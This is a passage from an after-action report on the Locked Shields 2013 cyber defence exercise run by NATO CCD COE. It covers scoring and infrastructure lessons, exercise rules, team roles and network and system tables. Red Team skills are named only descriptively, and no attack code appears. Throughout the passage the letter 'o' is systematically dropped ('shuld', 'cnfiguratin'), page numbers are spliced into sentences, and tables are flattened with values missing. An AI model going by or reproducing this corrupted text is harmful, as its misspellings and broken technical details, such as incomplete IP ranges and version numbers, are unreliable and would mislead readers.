58 A bt shuld write the reprt t a specific BT channel t get their attentin. In e.g. 15 minutes the bt shuld ask the blnde t cnfirm whether anything changed - if nt a negative scre shuld be autmatically assigned The RT shuld als have a read access t this map fr feedback. 7. The backgrund brief r game rules shuld explain that, while we endeavur t ensure fair scring and RT pressure, it will likely nt be ideal. The pint f the exercise is nt t get the mst pints, but t learn frm it. Therefre, cmpetitin fr pints is discuraged and a gd sense f humur is appreciated. 8. BTs shuld see the scres and scring ratinale fr ther BTs, in rder t learn frm the mistakes and successes f thers. A delay shuld be incrprated in this t ensure fairness. The mechanism needs t be cmmunicated very clearly. 9. Verifying RT reprts is still prblematic. It shuld be autmated as much as pssible. Fr example, thrugh the use f flags (RT steals a flag and uplads it t the scring systems as prf f successful attack; RT places flags n cmprmised systems that the scring bts can 'see'; etc.). 10. A scring checklist fr every categry shuld be develped t facilitate faster scring. It takes hurs t scre 10 SITREPs. Hwever, there is little chance t crssreference reprted events with real events. 11. Injects shuld be designed s that scres can be assigned within ne hur f the end f inject. This can be achieved with better planning r increased manpwer in the inject teams. Inject scres fr OPS and legal were determined and input t late. BTs had n chance t learn during the game. 12. Media wrked well and they managed t keep the scres cming in thrughut the game. 13. Excessive infrmatin sharing shuld give negative pints, nt psitive. BT chat was spammed with helpful inf as BTs tried t scre cperatin pints. Smetimes the messages were generic and did nt prvide useful infrmatin. 14. Peridic assessments f lightweight reprting and cperatin (chat) wrk better than individual reprt scring, in terms f maintaining scring balance. The methd f scring the lightweight reprts was changed n the fly due t the massive number f reprts cming in. An aggregate hurly scre was assigned instead f giving pints fr each separate reprt. This was gd t keep the scres balanced but it als intrduced a new prblem - it was nt clear t the BTs hw they culd imprve reprting and what the evaluatrs understd as a gd reprt. 15. SLA bnus scring shuld be autmated. Sharing SLA percentages t the BTs gave GT a lt f investigatin wrk Technical Envirnment Cre Infrastructure 1. The technical infrastructure f EDF was stable, and n majr dwntime ccurred in cntrast t previus years. At minimum, the fllwing imprvements are required (t cnduct an exercise n the same scale f LS13) t increase perfrmance: 58

59 Each team server shuld have at least 96GB RAM. Recmmended ptin is t add anther server with the same capacity per team (12 cres, 96 GB RAM) The strage server shuld have 20 additinal 10k disks in the 10k-disk pl t imprve Team LUN-s perfrmance. This pl shuld be cnverted t RAid5. Switching infrastructure shuld be upgraded t allw mre than 256 VLANs. 2. The cmpnents f the infrastructure must be built and tested, taking int accunt the number f users during main executin. At the beginning f Day 0 the mail server (mail.ex) was nt wrking prperly because f lw number f max allwed sessins. Apparently, the Dvect POP3/IMAP server had changed default values in its latest versin, which was unexpected. A similar prblem ccurred with the cllabratin platfrm (a small default setting fr the number f simultaneus clients in Ubuntu's Apache cnfiguratin) 3. At least 2 BTs faced issues with the VPN bxes. DHL delivered BT10 the wrng bx. The radi part f BT1 VPN bx was malfunctining (5 GHz transceiver). Wired cnnectins had n prblems. 4. QS n central VPN/FW device shuld be cnfigured. The traffic required fr remte access t the envirnment (MGMT zne) shuld have pririty ver Internet traffic initiated frm the Gamenet Cllabratin, SA and Scring Platfrm 1. The scring system crashed during the game, resulting in general cnfusin and delayed scres. The prblem was in ne specific setting f the cllab envirnment (xmpp-rate-limitsetting was nt enabled t prtect against peaks in data). Based n the experience, this kind f issue always happen right befre VIP visits. YT and GT shuld plan accrdingly. 2. The system t submit and scre SITREPs has several usability flaws. a. The BT is able t mdify the SITREP after the deadline. This was mitigated by pening the reprts in separate brwser tabs when the deadline arrived. It is still a prblem, since a late submissin may nt be discvered and it may be cnfusing t determine which versin t scre: the ne that was submitted n time? the ne that was updated befre deadline? the mst detailed ne that was updated 15 minutes late? While it is pssible t track this frm the wiki change lg, it is cumbersme. Recmmendatin: use a submit buttn that allws the reprt t be upladed t the scring page. Each reprt can be submitted nce. b. The BT is able t submit multiple reprts fr the same time perid (this happened nce during LS13). This is cnfusing t the screr, especially if bth reprts cntain sme infrmatin (n dummy reprts). Recmmendatin: allw nly ne SITREP be submitted per time perid. 59

60 c. The screr needs t navigate t a different wiki page in rder t scre the SITREP. Recmmendatin: find a way t assign the SITREP scre n the wiki page that has the actual reprt. 3. Strict wiki frm fr SITREPs shuld be enfrced. One team submitted the SITREP as a file attachment t the wiki page. 4. The inject scre and special scre wiki slutins wrked well Gamenet 1. The traffic generatr system experienced many prblems during the exercise, and it didn t generate the anticipated vlume f traffic. Agents were nt launched n ws1* machines due t name mismatch under scheduled tasks. The agents were using prt 8181 t cnnect t the crdinatr but the BTs were nt required t keep that utging prt pen. The agents were stpped because f BT activities: Killing Java prcess. Disabling scheduled tasks. Installing sandbx sftware that prevented all agent's activities. There were issues with parsing the HTML cde f cmprmised pages. traffic was limited due t prt 25 being blcked. 2. The traffic generatr and autmatic scring system have t be cmbined. This is the nly methd that mtivates BTs t keep the traffic agents running and functinal. 3. Traffic agent develpment ideas Mre 'real nise' in Gamenet. Mre bts, wh d just 'half-brken' stuff (typs in url...). Make sure the User Agent in HTTP requests is nt smething distinguishable (like Java/1.7.0_17 r Java/1.7.0_21). 4. Feasibility f autmating clicking t sme degree shuld be explred. AutIT is ne pssible slutin that has been used in ther cyber ranges. 5. Virtual machines shuld be allcated enugh resurces. Sme Windws 7 wrkstatins had nly 10GB f disk. They became full and scring failed. BTs need mre resurces fr their wn VMs. Fur vcpus and 4GB RAM are ften the minimum they request. 6. The netwrk design f the technical envirnment needs t be recnsidered. The cmputers f WT members wh are nt respnsible fr playing blndes shuld be placed in a separate segment. Access t cllabratin tls such as chat channels, wiki, and Skype must be nt affected by ptential disruptins in the Gamenet. 60

61 The BT service-checking machine (btx.ex) shuld be placed int the netwrk segment where frm the availability checks are dne. Any attempts t scan thse netwrks by BTs must be frbidden. 7. Sme required features fr VM management that were identified during the Test Run were nt implemented crrectly. Cpy-paste between the management hst and virtual machines. This is especially imprtant fr the blndes t cpy-paste links frm Jabber t VM. Shared flders between wrkstatins. 8. The news prtal settings shuld be tested befre the game t make sure all required functinality exists. It was nt pssible t uplad images t the blg. In the beginning, cmments required mderatin but this was slved quickly. 9. Giving the BTs sme respnsibility fr the WAN infrastructure made the exercise mre interesting and realistic. This shuld be taken t the next step. The beta image f Cisc CSR 1000v virtual ruter wrked withut issues. The limitatin f 50Mbps was never reprted as a prblem. One BT had cnnectivity issues, but after actin analysis prved that this was their cnfiguratin mistake (imprper use f ip verify unicast reverse-path ). Only 1 ut f 2 planned WAN scenaris was played ut due t GT members being verladed. 10. Gamenet and Blue Team Systems shuld be mre variable, advanced and interesting. Examples f cmpnents t cnsider: 9.14 Rules IPv6. Mre custm and legacy systems. Oracle and/r DB2 databases, sme very ld zos bxes, Unix servers. Mbile device emulatrs (lder versins f Andrid and ios). Mre encrypted prtcls t frce detectin t applicatin level (mre applicatins using HTTPS, encrypted s). Simulated satellite cnnectins. 1. A specific rule in RE shuld be written which states that WT leader can decide t revert BT machines. WT leader decided t revert certain BT machines in rder t get them t cmply with the rules. One BT bjected t this. 2. BT size limit shuld be set t 12, including legal advisrs. In additin, the limit n BT size shuld grw when mre challenging envirnments and cmpnents are intrduced. Fr instance, BT2 wuld have felt mre cmfrtable had they had 15 members in a team instead f There is a ptential prblem with the game cmplaint mechanism, which states that cmplaints that ccur during the game must be raised within tw hurs f the event, and respnded t within tw hurs f receipt. The issue is with cmplaints that ccur at the end f the playing day, in the last tw hurs f each day. Since the cmplaints need t be raised 61

62 thrugh the Liaisns (wh are nt there after the game is stpped fr the day), the BTs d nt have a way t raise cmplaints. Recmmendatin: Either change the prcess t ignre the intervening night (event in the last hur f Day 1 can be reprted and respnded t at the beginning f Day 2; events in the end f Day 2 will be added t final scre cmplaints) r cme up with sme ther slutin. 4. A 72 hur final cmplaint prcessing windw is lng enugh. The cmplaint cllectin in the real-life system is k. Hwever, the exact cmplaint windw shuld be annunced during the scring brief detailing when the latest time a cmplaint can be made. 5. This year tw frmer RT members defected t the Blues. The knwledge f key decisinmakers (and their thught prcesses) and f scring prcesses pssibly gave them an advantage, as evidenced by the 1st and 2nd places that their teams achieved this year. This als raises an interesting issue the ptential f WT, GT, RT, r YT members jining BTs during the planning prcess. Recmmendatin: enfrce a general planning rule that, nce a persn has jined the exercise planning team in any capacity, they will nt be allwed t participate in the BT fr that year's exercise. They are free t jin the fllwing year's exercise. Recmmendatin: enfrce a general planning rule that peple wh are leaving the planning team will lse access t the planning envirnment. 6. The rules regulating what the BTs are allwed t d in technical envirnment need t be imprved. Sme teams take a narrw view n the rules. Althugh the mtivatin behind the rule shuld be understandable, BTs start t play with the details. Therefre thse details shuld be made clearer: What kind f sftware must remain installed n the servers? What kind f services must be prvided? What are the exact requirements fr cmmunicatin flws (firewall rules)? What des patching is nt allwed mean? Are custm mdificatins t surce cde allwed? What are the requirements fr perfrmance f systems and services? Anther prblem that shuld be avided is updating f the rules. This was dne due t the fact that clarificatins were requested by the BTs. Sme rules were cnsidered t restrictive (such as nt being able t d fix vulnerabilities with custm mdificatins t WrdPress, r enabling NFS n ne system). In general, BTs accepted that restrictins are necessary t keep the exercise interesting and challenging. 7. The mst wide-spread defence methd was just t blck any suspicius IP addresses. This is an easy way t kill the game and shuld be made mre difficult. Firstly, better legitimate traffic generatin wuld help. Secndly, blcking culd be restricted with sme rules as prpsed by an RT member. BTs shuld be required t prvide services and clients which are infected. 62

63 In additin, many clients culd cme thrugh the same prxy r NAT device, s blcking a malicius ne culd blck als legitimate users Administrative Issues 1. The facilities shuld be changed t imprve cmmunicatin and crdinatin between the teams. The cmmn rm fr WT, LT and YT was fairly crwded. RT was split int 2 rms, but therwise satisfactry. GT rm was half-empty. It wuld be better t situate all WT, LT, GT and YT members in ne rm and all RT members in a secnd big rm. The rms must be near each ther. One cnference rm which culd be split by a party wall wuld be perfect t enable cmmn feedback sessins. 2. The fllwing aspects shuld be taken int accunt when preparing the facilities: RT seating shuld be mre shulder-t-shulder t imprve cmmunicatin. Zulu time clcks shuld be placed n the walls f each rm and all systems including the nes used fr WebEx shuld be cnfigured t Zulu. Printers have t be available in the main cntrl rm and RT rm. WT liaisn fficers and clickers must have large frmat mnitrs. The visitrs shuld nt blck the hall and entrance t the cntrl rms. This happened fr 30 minutes when the last critical attacks were cnducted. 63

64 10 Acknwledgements NATO CCD COE wuld like t thank all ur partners wh helped t rganise LS13 fr their significant cntributin, and all Blue Team members fr making the exercise a remarkable experience. In particular, we wish t thank the Estnian Infrmatin System s Authrity, Estnian Defence Frces, Estnian Cyber Defence League, Finnish Defence Frces, Finnish Cmmunicatins Regulatry Authrity, NATO Cmputer Incident Respnse Capability Technical Centre, Swedish Natinal Defence Cllege, France General Directrate fr Armament, Plish Ministry f Natinal Defence, CERT-LV, Cisc Systems, Clarified Netwrks, XenSense, Clarified Security, ByteLife, IT Centrs, Stnesft, and Raphael Mudge and Jussi Jaaknah. 64

65 11 Acrnyms BT Blue Team NATO CCD COE NATO Cperative Cyber Defence Centre f Excellence C&C Cmmand and Cntrl CDX Cyber Defence Exercise CND Cmputer Netwrk Defence CS Client-Side Team ECDL Estnian Cyber Defence League FDF Finnish Defence Frces FPC Final Planning Cnference GT Green Team HQ Headquarters IPC Initial Planning Cnference LS Lcked Shields LT Legal Team MPC Main Planning Cnference POC Pint f Cntact PTH Pass-the-Hash RDP Remte Desktp Prtcl RT Red Team SA Situatinal Awareness VM Virtual Machine WT White Team YT Yellw Team 65

66 1 f 7 Cntents 1. Blue Teams 2. Legal Advisrs 3. Red Team 4. White Team 5. Green Team 6. Yellw Team 1. Blue Teams 1.1. Descriptin Blue Teams were the main training audience f LS13 exercise. They had the fllwing main tasks: Secure a virtual IT infrastructure and defend it against the Red Team s attacks. Maintain services described in exercise dcumentatin assuring the availability, cnfidentiality and integrity f the systems. Reprt detected incidents t the White Team thrugh cntinuus lightweight reprting and management level SITREPs. Cmplete business tasks injected by the White Team. Respnd t infrmatin requests and queries frm the media. Majrity f Blue Team systems were pre-built by the Green Team. Each Blue Team was allwed t deply up t 2 wn virtual Machines (VM) in additin fr e.g. netwrk traffic analysis. Blue Teams were allwed t use their wn tls and sftware prvided they d nt cntravene any licensing terms Number f Teams, Size and Lcatin «Nr f Teams «Team Size «Lcatin «Blue Varius, each team has t find the lcatin The number f Blue Teams was limited t 10 due t technical cnstraints and the capabilities f the White, Red and Green Team. The number f members in each Blue Team was limited t 10 persns plus 1-2 legal advisrs. Blue Teams had t participate in the Executin f LS13 frm their wn facilities. Team members were nt required t be physically c-lcated Rles

67 2 f 7 The fllwing rles were expected t be present in each team: Team Leader verall management f team s activities and POC t exercise cntrllers. Deputy Team Leader - alternative POC fr the team. IT specialists and incident handlers administrating and securing the systems t defend against Red Team s attacks; mnitring, detecting and mitigating the attacks. Reprter reprting the Blue Team activities t the White Team which helps the White and ther teams t get situatinal awareness. Spkespersn cmmunicating with inquisitive jurnalists. Each Blue Teams were asked t accept a legal advisr frm their wn natin t be engaged with the team Expected Skills Blue Teams were suggested t have the specialists with the fllwing skillsets in the team: System and Netwrk Administratin TCP/IP netwrking. Administratin f and securing Windws and Linux based systems. Sme examples: Windws dmain and Active Directry Wrkstatins and servers based n different Windws versins Linux servers running n Ubuntu and Debian distributin Firewalls based n Netfilter, prxy servers Cmmn netwrk prtcls, services and technlgies like DNS, NTP, DHCP, HTTP and HTTPS, SMTP, POP3, IMAP, SSH, FTP, RADIUS VMWare vsphere virtualizatin platfrm Administratin f netwrk devices (switch running Cisc NX-OS, ruters running Cisc IOS and BGP ruting prtcl). Prgramming skills in high-level language. Web applicatin technlgies and develpment HTML, client-side and server side scripting such as?javascript and PHP, SQL databases such as MySQL. Cmputer Netwrk Defence Mnitring, detecting, analysing, reprting, reslving security incidents. Public Relatins Spkespersn shuld have participated in a media training. 2. Legal Advisrs 2.1. Descriptin Individual legal advisrs did nt wrk as a team but they were rather cnsidered as the members f the respective Blue Teams. Legal advisrs were part f the main training audience f LS13. There were three main bjectives fr engaging legal advisrs int the exercise: 1. T educate legal advisrs abut infrmatin technlgy, with particular attentin n

68 3 f the technical executin f cyber peratins. The legal advisrs were able t fllw the technical experts and the actins taking place in the netwrk. T prvide pinins and bservatins n assciated legal issues primarily related t the law f armed cnflict, as they derive frm the stryline, including legal risk management and peratinal issues. T create a dialgue and facilitate cperatin between technical experts and legal advisrs Number f Teams, Size and Lcatin One r tw legal advisrs accmpanied each Blue Team. Preferably, the legal advisrs were frm the same natin r rganisatin as the majrity f the Blue Team members Expected Skills Legal advisrs wh are required t deal with cyber-related issues in their fficial psitins were encuraged t participate. They were expected t have at least very basic knwledge abut infrmatin technlgy as therwise he r she wuld have risked with the fact that the infrmatin cming frm the Blue Team is incmprehensible and the legal advisr wuld have nt met the first training bjective. 3. Red Team 3.1. Descriptin Red Team s missin was t cmprmise r degrade the perfrmance f the systems prtected by the Blue Teams. Red Team had t accmplish 20 specific bjectives and were wrking clsely tgether with White Team during the Executin. The fcus f LS exercise was t train the Blue Teams. Therefre Red Team members culd be mainly cnsidered as the "wrk-frce" t entertain the Blues. The Red Team used white-bx apprach. The technical details abut the initial cnfiguratin f the Blue Team systems were available t the Red Team befrehand alng with the pprtunity t scan Blue Team systems fr vulnerabilities and test ut the explits befre the executin. This apprach reflected the situatin when the attackers have insider infrmatin frm the target cmpany. It als helped t balance the fact that in real-wrld situatin, mtivated attackers wuld have n cnsiderable time cnstraints as there were during the exercise. In additin, during the CDX Blue Teams knw that they will be attacked during the shrt timeframe f the game and have cncentrated their defense effrts Number f Teams, Size and Lcatin «Nr f Teams «Team Size «Lcatin «Red 1, many sub-teams 40 Tallinn 3.3. Apprach fr the Red Teaming The main challenge regarding Red teaming within the CDX cntext is t cmpile enugh persnnel t entertain all Blue Teams smewhat equally, yet t be able t handle the

69 4 f 7 cllabratin verhead and handver prcedures. Cllabratin crucial t vercme prblems with fluidity and cntinuity f attack campaigns (e.g. in-depth penetratin and persistence within cmprmised netwrks instead f pprtunistic jabs). T ensure equal distributin f applied skills the Red Team cllabrated as ne. Hwever, it was divided int fllwing sub-teams: Client-side attack team (CS) Web applicatin attack team (WEB) Netwrk layer attack team (NET) 3.4. Expected Skills In general, suitable Red Team candidates are members f penetratin testing teams, Red Teams r similarly riented teams r individuals with relevant teamwrk experience. Red Team members were expected t have recent backgrund in penetratin testing r red teaming. They were als suppsed t be experienced in cnducting such activities as part f the team (cllabratin, handver, infrmatin exchange). Examples f minimum skillsets were: Remte and client-side explitatin Lcal explitatin and privilege escalatin LAN infrastructure explitatin (L2 and L3 attacks) WAN infrastructure attacks (attacks against BGP) Web applicatin pentesting skills (SQL injectin, file inclusin, input validatin bypassing, etc.) Desirable additinal/specialised skills included: Ability t hide and stay resistant in cmprmised hsts and netwrks (backdrs, rtkits, aviding detectin such as lg and timestamp mdificatin). In-depth penetratin skills: taking ver the initial penetratin (shell, backdr, Meterpreter sessin, etc) and expliting further int the netwrk e.g. pass-the-hash, LAN explitatin, malware spreading. Fuzzing - capable f fuzzying prtcls and taking use f fund vulnerabilities during the shrt game executin perid, crashing f services during destructive phases Tls Participants were expected t bring their wn laptps set up with tls f their wn liking as lng as cvered by licensing when using cmmercial tls and as lng as teamwrk (e.g. task handver / wrklad sharing) was feasible. Within the virtualized exercise envirnment, Kali Linux was used as ne f the main free attacking platfrms fr Red Teams. Cbalt Strike sftware was used fr teamwrking - the authr, Raphael Mudge, prvided an pprtunity t use his tl free f charge. 0days were permitted and desired but the prbability that smene wuld intrduce explits against unpublished vulnerabilities is very lw in the cntext f an UNCLASS exercise. 4. White Team

70 5 f Descriptin White Team's (WT) tasks during the preparatin perid were: 1. Defining the training bjectives. 2. Develping the scenari: a backgrund stry, rles fr Blue and Red Team, intelligence injects, etc. 3. Defining high-level bjectives fr the Red Team. 4. Preparing business tasks fr the Blue Teams and inject list. 5. Creating a plan fr simulated media. 6. Preparing cmmunicatin plan. 7. Defining scring criteria and detailed scring table. 8. Preparing reprting frmats and sample reprts fr SITREPs 9. Develping the rules. The rules have t cver general aspects such as hw the exercise will be run, regulatins fr Blue Team activities and rules f engagement fr the Red Teams. White Team's main tasks during the Executin were the fllwing: Cntrlling the exercise and Red Team campaign. White Team must have a clse cperatin with the Red Team. White Team decides when different phases start and stp, when the Red Teams have t wait r slw dwn their activities. Evaluating the prgress f the Blue and Red Teams and assigning manual scres. White Team has t evaluate the reprts abut successful cmprmises issued by the Red Team which will result in negative scre. Successful detectin f attacks described in incident reprts, ability t respnd t business injects, new creative ideas hw t defend and cllabrate with ther Blue teams will give psitive scre. Liaisning with the Blue Teams. Simulating the activities f Blue Team rganizatin's clients. Fr instance, clients culd request t get new services r cmplain ver the quality f the services. Simulating the management and the users f the rganizatins which netwrks the Blue Teams are defending. Firstly, White Team will inject the Blue's different business tasks such as install new applicatin t user's desktps, set up a new public service r prvide the bss remte access t the file server. Secndly, White Team members simulate the actins f rdinary users f Blue Team rganizatins by brwsing the (game) internet, pening attachments, sending cmplaints. The als have t d selective checks n Blue Team systems t detect changes in functinality that may be nt detected by the autmatic scring system. Simulating the Media. Fr instance, injecting news stries and acting as cntacting the Blue Teams as jurnalist Team Size and Lcatin «Nr f Teams «Team Size «Lcatin «White 1 15 Tallinn 4.3. Rles

71 6 f 7 During the executin, there were fllwing rles and sub-teams inside White Team Exercise Cntrl Leader and Deputy Leader: running the exercise, deciding when t start certain phases, etc Schedule Master: keeping the schedule Cmmunicatins and Blue Team liaisning team Asking and prviding feedback frm and t the Blue Teams Simulating the users and clients (Blndes) Validating the functinality f Blue Team Systems Red Team liaisning - cnsidered mainly as part f Red Team Running the Injects Inject Master: planning scenari injects and crdinating the verall plan fr all injects Media Simulatin Cell Legal Team: running legal injects Scring Scring Master: verall respnsibility fr the scring Lightweight reprts evaluatin team: cnsisted f 3 persns frm CERT-EE Evaluating respnse t scenari, legal and media injects Making manual scring decisins 4.4. Expected Skills In general, White Team members are expected t be experienced security practitiners. They must have gd management skills, sund technical backgrund and ability t make gd decisins fast. Hwever, White Team members can always cnsult with specialists in Green Team in case deep technical questins have t be slved. 5. Green Team 5.1. Team Descriptin Green Team (GT) was respnsible fr preparing the technical infrastructure in the lab. GT had t carry ut the fllwing tasks: Design, set up and cnfigure the cre infrastructure: physical devices, virtualizatin platfrm, strage, netwrking, remte access, traffic recrding, VPN ruters fr the Blue Teams, user accunts, etc. Design and build the Gamenet and Blue Team netwrks. Prgram the autmatic scring bt and agents. Develp slutin fr traffic generatin. Set up slutins that are required fr mnitring the general exercise infrastructure Number f Teams, Size and Lcatin Green Team had many members but nly few f them culd cntribute full time during the main 4-mnth preparatin perid.

72 7 f 7 «Nr f Teams «Team Size «Lcatin «Green 1 15 Lughbrugh, Madrid, Tallinn 5.3. Expected Skills Naturally, experienced system administratrs and sftware develpers were preferred t jin the Green Team. Team members had t be capable f building and administering typical cmpnents f IT infrastructure: Cre infrastructure: Cisc UCS platfrm, VMware vsphere fr virtualizatin, EMC strage devices, netwrk switches, firewalls and VPN gateways. Gamenet: Linux and Windws wrkstatins and servers; PHP and Java based web applicatins; Cisc and Linux ruters; prgramming skills fr develping scring and traffic generatin sftware. Few Red Team members prvided cnsiderable supprt t the Green Team t prepare the Blue Team systems. 6. Yellw Team 6.1. Descriptin The Yellw Team's (YT) rle was t prvide situatinal awareness abut the game situatin mainly t the White Team but als t all ther participants. The main surces f data fr the Yellw Team were lightweight reprts prvided by the Blue Teams, reprts n the status f attack campaign received frm Red Team members, results f autmatic scring checks, and manual scring decisins. The Yellw Team analyst had interfaces t review all the reprts and assign them tags based n the cntent f the reprt. Regular highlight updates were prvided t White Team leader and t the Blue Teams. Yellw Team als prepared different views and visualizatins f the situatin. Yellw Team develped the technical slutin fr lightweight reprting as well as wiki-based frms and instructins fr the Blue Teams. Tw webinars were cnducted t explaing the reprting and visualisatins in VSRm Number f Teams, Size and Lcatin «Nr f Teams «Team Size «Lcatin «Yellw 1 NA Helsinki, Tallinn

73 1 f 2 Cntents 1. Cisc UCS Platfrm 2. Netwrking Layer 3. Strage 4. Virtualizatin 5. Remarks 1. Cisc UCS Platfrm x Cisc UCS B200 M2 servers: 2 X Intel X5650 prcessrs 48GB RAM (1.3Ghz, 8GB DIMM's), 2 Prt FCE 10Gbps Each Blue Team had their systems running in ne f these blades. 6x Cisc UCS B200 M3 servers: 2 X Intel E prcessrs 96GB RAM (1.6Ghz, 8GB DIMM's), 2 Prt FCE 10Gbps The cluster f these blades hsted all ther systems such as ISP ruters, Red Team VMs, traffic recrding and cllabratin systems, etc. 6 x 4 prt Cisc fabric extender UCS x 20 prt Fabric Intercnnect UCS Netwrking Layer x Cisc Catalyst 2960S-24TS-S 2x Cisc ASA 5550 security appliances fr ruting/firewalling between cre infra segments and prviding remte VPN access t the participants. 3. Strage 2x EMC VNX5300 strage arrays were used with the fllwing disks fr creating many different strage pls: 28x 600GB 10K SAS, 5x 100GB EFD, 16x 600GB 15K SAS 15x 1TB NL-SAS, 11x 600GB 10K SAS The fllwing strage pls were set up n the first VNX server: VMFSes fr Blue Teams x 600GB 10K SAS, RAID6, real capacity 9 TB VMFSes fr Red Team Kali s/backtracks, exercise supprt infra, Blue Teams 11-12, ESX bt LUNs 15x 600GB 15K SAS, RAID5, real capacity 6,4 TB System infrmatin 4x 600GB 10k SAS, RAID0

74 2 f FAST cache 4x 100GB EFD, RAID1 Ht spares The fllwing strage pls were set up n the secnd VNX server: Cre infra management VMs (DC, MS SQL), Yellw Team Recrder and Cllab, Blue Team Nexus 1000v Virtual Supervisr Mdules 10x 600GB 10K SAS, RAID6, real capacity 4TB File server with several shares (CIFS, NFS, FTP) t hld scripts, templates, install images, archived VMs, backup data 10x NL- SAS, RAID5, real capacity 7,3TB 4. Virtualizatin VMWare vsphere 5.0 Enterprise Plus was the underlying virtualizatin platfrm. 5. Remarks Selecting the unified cmputing platfrm fr exercise infrastructure was a gd decisin. Our main cnstraint is the number f peple wh can cntribute int the preparatins f the CDX and we believe UCS saved us time in management. Still, this estimatin is purely empirical and we d nt have cncrete measurements. In cntrast t the previus exercises we have cnducted, there were n infrastructure break-dwns during the game, nly few teams reprted slwness in accessing their systems. Traffic recrding using Cisc Nexus 1000v switches and ERSPAN prtcl wrked smthly. The requirement fr cllecting all data centrally and als prviding the Blue Teams an ptin t sniff the data frm all their VLANs was met. As expected, the strage was the mst utilized cmpnent (ften 100% f the capacity). Other cre infrastructure cmpnents (blades, ASA, switches) were mderately utilized.

75 1 f 12 Cntents 1. Simulated Internet 2. Znes 3. Blue Team Systems 1. Simulated Internet In general, the Gamenet culd be seen cnsisted f tw main parts: Simulated Internet (SINET): ruting infrastructure, bad guys and all kind f supprt systems. Blue Team Systems: identical netwrks fr all Blue Teams. Netwrk scheme f the SINET was the fllwing:

76 2 f Znes The fllwing table describes the majr netwrk Znes in LS13 Gamenet. Znes Name Abbreviatin VLAN IP Range Descriptin Management MGMT 1XX XX.0/24 Management interfaces fr Blue Team VMs. Private VLAN Management2 MGMT2 100, XX/32, Nexus admin interfaces and Windws hst fr accessing vcenter

77 3 f 12 Simulated Internet (GT) Simulated Internet (RT) Simulated Internet (BT) Missin Demilitarized Zne Missin Welfare Area Missin Internal Wrkstatins XX/32 server GT_SINET /24 RT_SINET /18 BT_SINET /24 Green Team servers prviding services like DNS, NTP, sftware repsitries fr updates, news prtal news.ex, mail server mail.ex,... Custmer traffic (scring, White Team members, traffic generatin) and systems f malicius parties are lcated in this Zne Each Blue Team has ne VM that they can use t check their services frm the SINET MIL_DMZ 1XX6 10.X.6.0/24 Public services fr missin netwrks MIL_WEL 1XX7 10.X.7.0/24 Welfare area fr sldiers t brwse Internet, call hme, etc MIL_INT 1XX3 10.X.3.0/24 UNCLASS wrkstatins mainly fr cmmunicating with lcal authrities in Blea Aid Org DMZ AID_DMZ 1XX8 10.X.108.0/24 Public services f the Aid Organizatins Aid Org Wifi AID_WIFI 1XX9 10.X.109.0/24 Aid Org Internal Wrkstatins Wifi area fr vlunteers jining t wrk fr the Aid Organizatins. BTs d nt have access t the machines plugged int this segment AID_INT 1XX4 10.X.104.0/24 Wrkstatins fr Aid Organizatin emplyees XX dentes 2-digit team number (01, 02,..., 10) 3. Blue Team Systems Each Blue Team had t manage 2 small netwrks which accrding t the scenari were lcated in physically different places. All systems were virtual machines running n VMware vsphere platfrm. The netwrks cnsisted f typical cmpnents ne culd find in ffice netwrks and many web applicatins with public access. Each MIL-side ruter f a Blue Team was cnnected with the SINET thrugh 2 ISP ruters. It had als cnnectins with tw "adjacent" Blue Teams. The netwrk interfaces fr thse links were cnnected but nt cnfigured. During the exercise, the teams had t cperate with each ther tw in rder t set up redundant links. Blue Team netwrk scheme culd be fund belw:

78 4 f 12 Descriptins f individual systems have been prvided in the fllwing table: «Zne «IP «MGMT_IP «OS «RAM «Descriptin «Patching «Required Services «btx.ex BT_SINET XX XX.51 Ubuntu Desktp 512 Linux allwed n scred

79 5 f 12 «Zne «IP «MGMT_IP «OS «RAM «Descriptin «Patching «Required Services «12.04 wrkstatin fr Blue Teams t check their wn services services chat.aidx.ex AID_DMZ 10.X XX.88 Ubuntu Server bit 512 Chat server fr aid rganizatin running IRC daemn allwed IRC (TCP: 6667) IRC SSL (TCP: 6697) cunting.aidx.ex AID_DMZ 10.X XX.86 Ubuntu Server bit 512 Bdy cunting system allwed HTTP (TCP: 80) csr.milx.ex VLAN15XX, VLAN15XX+1, VLAN1XX0, VLAN1XX1, VLAN1XX X+1.0/24, X.0/24, 10.X.0.2, 10.X.1.2, 10.X XX.2 Cisc IOS-XE 4096 WAN ruter fr cnnecting military unit with ISPs allwed BGP (TCP: 179; fr peers) SSH (TCP: 22) db.aidx.ex AID_DMZ 10.X XX.84 Ubuntu Server Database server fr few web applicatins. NFS server fr file shares allwed HTTP (TCP: 80) MySQL (TCP: 3306) NFS (All required daemns) dc.int.aidx.ex AID_INT 10.X XX.42 Windws Server Dmain cntrller fr allwed W32Time DNS

80 6 f 12 «Zne «IP «MGMT_IP «OS «RAM «Descriptin «Patching «Required Services «int.aidx.ex Kerbers LDAP RPC SMB X... dc.int.milx.ex MIL_INT 10.X XX.32 Windws Server Dmain cntrller fr int.milx.ex allwed W32Time DNS Kerbers LDAP RPC SMB X... dns.aidx.ex AID_DMZ 10.X XX.82 Ubuntu Server bit 256 DNS server fr Zne aidx.ex allwed DNS (TCP: 53) DNS (UDP: 53) SSH (TCP: 22) dns.milx.ex MIL_DMZ 10.X XX.62 Ubuntu Server bit 256 DNS server fr Zne milx.ex allwed DNS (TCP: 53) DNS (UDP: 53) SSH (TCP: 22) files.int.aidx.ex AID_INT 10.X XX.43 Windws Server 2003 R2 32bit 2048 Internal fileserver fr aid rganizatin allwed SMB (TCP 445)

81 7 f 12 «Zne «IP «MGMT_IP «OS «RAM «Descriptin «Patching «Required Services «emplyees files.int.milx.ex MIL_INT 10.X XX.33 Windws bit 4096 Internal fileserver fr military unit allwed SMB (TCP: 445) fw.aidx.ex AID_DMZ, AID_INT, AID_WIFI, VLAN1XX2 10.X.102.1, 10.X.104.1, 10.X.108.1, 10.X XX.21 Linux Endian Firewall and VPN gateway fr AID rganizatin netwrks allwed DHCP (fr AID_WIFI) IPsec VPN SSH (TCP: 22) fw.milx.ex MIL_DMZ, MIL_INT, MIL_WEL, VLAN1XX5 10.X.3.1, 10.X.5.1, 10.X.6.1, 10.X XX.31 Linux Endian Firewall and VPN gateway fr missin netwrk allwed IPsec SSH (TCP: 22) help.aidx.ex AID_DMZ 10.X XX.87 Windws Server Help request and ticketing system web applicatin allwed HTTP (TCP: 80) lg.int.milx.ex MIL_INT 10.X XX.35 Ubuntu bit 4096 Pre-cnfigured lg management server allwed n scred services mail.aidx.ex AID_DMZ 10.X XX.83 Ubuntu bit 512 External mailserver fr aid allwed HTTP (TCP: 80) HTTPS

